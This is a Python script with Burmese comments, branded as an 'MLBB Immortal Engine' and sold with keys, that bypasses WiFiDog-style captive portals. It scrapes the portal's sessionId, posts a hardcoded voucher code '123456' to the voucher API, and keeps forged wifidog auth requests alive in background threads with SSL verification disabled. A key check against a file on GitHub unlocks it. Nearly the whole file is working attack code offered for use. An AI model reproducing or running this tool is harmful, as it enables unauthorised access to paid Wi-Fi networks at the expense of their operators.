import requests, re, urllib3, time, threading, os, socket
from urllib.parse import urlparse, parse_qs, urljoin

# SSL Warning တွေ မရှုပ်အောင် ပိတ်ထားမယ်
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

GAME_UA = "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Mobile Safari/537.36"

# --- [ SECTION 1: KO PHYO'S STARLINK ENGINE ] ---
def immortal_pulse(auth_link, session):
    while True:
        try:
            # verify=False ပါမှ Starlink လိုင်းကျော်တဲ့အခါ SSL Error မတက်မှာပါ
            session.get(auth_link, timeout=3, headers={"User-Agent": GAME_UA}, verify=False)
            socket.gethostbyname("1.1.1.1")
            time.sleep(0.3) 
        except: time.sleep(1)

def start_starlink_engine():
    main_session = requests.Session()
    while True:
        try:
            r = main_session.get("http://connectivitycheck.gstatic.com/generate_204", timeout=5)
            if r.status_code != 204:
                p_url = r.url
                r1 = main_session.get(p_url, timeout=5)
                match = re.search(r"location\.href\s*=\s*['\"]([^'\"]+)['\"]", r1.text)
                n_url = urljoin(p_url, match.group(1)) if match else p_url
                r2 = main_session.get(n_url, timeout=5)
                sid = parse_qs(urlparse(r2.url).query).get('sessionId', [None])[0]
                if sid:
                    p_host = f"{urlparse(p_url).scheme}://{urlparse(p_url).netloc}"
                    main_session.post(f"{p_host}/api/auth/voucher/", json={'accessCode': '123456', 'sessionId': sid}, timeout=5)
                    gw = parse_qs(urlparse(p_url).query).get('gw_address', ['192.168.60.1'])[0]
                    port = parse_qs(urlparse(p_url).query).get('gw_port', ['2060'])[0]
                    auth_link = f"http://{gw}:{port}/wifidog/auth?token={sid}"
                    for _ in range(3):
                        threading.Thread(target=immortal_pulse, args=(auth_link, main_session), daemon=True).start()
            time.sleep(10)
        except: time.sleep(5)

# --- [ SECTION 2: KEY VERIFICATION SYSTEM ] ---
def main():
    os.system('clear')
    print("\033[92m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print("\033[96m   ⚔️  MLBB IMMORTAL ENGINE v12.0 (PUBLIC)  ⚔️")
    print("\033[92m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\033[0m")
    
    user_key = input("\033[93m[?] Enter Your Key: \033[0m").strip()

    # ၁။ Key ရိုက်လိုက်တာနဲ့ Starlink Engine ကို Background မှာ တန်းဖွင့်ပေးမယ်
    print("\033[94m[*] Initializing Starlink Bypass Engine...\033[0m")
    threading.Thread(target=start_starlink_engine, daemon=True).start()

    # ၂။ Public ဖြစ်သွားလို့ Token မလိုတော့တဲ့ Link အမှန်
    url = "https://raw.githubusercontent.com/kophyo-ops/mlbb-v12/main/keys.txt"
    start_time = time.time()
    
    print("\033[94m[*] Waiting for Internet Connection (Max 60s)...\033[0m")
    
    while time.time() - start_time < 60:
        try:
            # SSL Verification ကို ပိတ်ထားမှ Handshake failure ကို ကျော်နိုင်မှာပါ
            r = requests.get(url, timeout=5, verify=False)
            if r.status_code == 200:
                if user_key in r.text:
                    print("\033[92m\n[✓] KEY VERIFIED! ACCESS UNLOCKED.\033[0m")
                    # အောင်မြင်သွားရင် Engine ကို ဆက်ပွင့်နေစေဖို့
                    while True: time.sleep(100)
                else:
                    print("\033[91m\n[!] Error: Key မမှန်ကန်ပါ။\033[0m")
                    os._exit(0)
        except: pass
        time.sleep(2)

    print("\033[91m\n[!] Timeout: Bypass မအောင်မြင်သောကြောင့် ပိတ်လိုက်ပါပြီ။\033[0m")
    os._exit(0)

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n\033[91m[!] Engine Stopped.\033[0m")
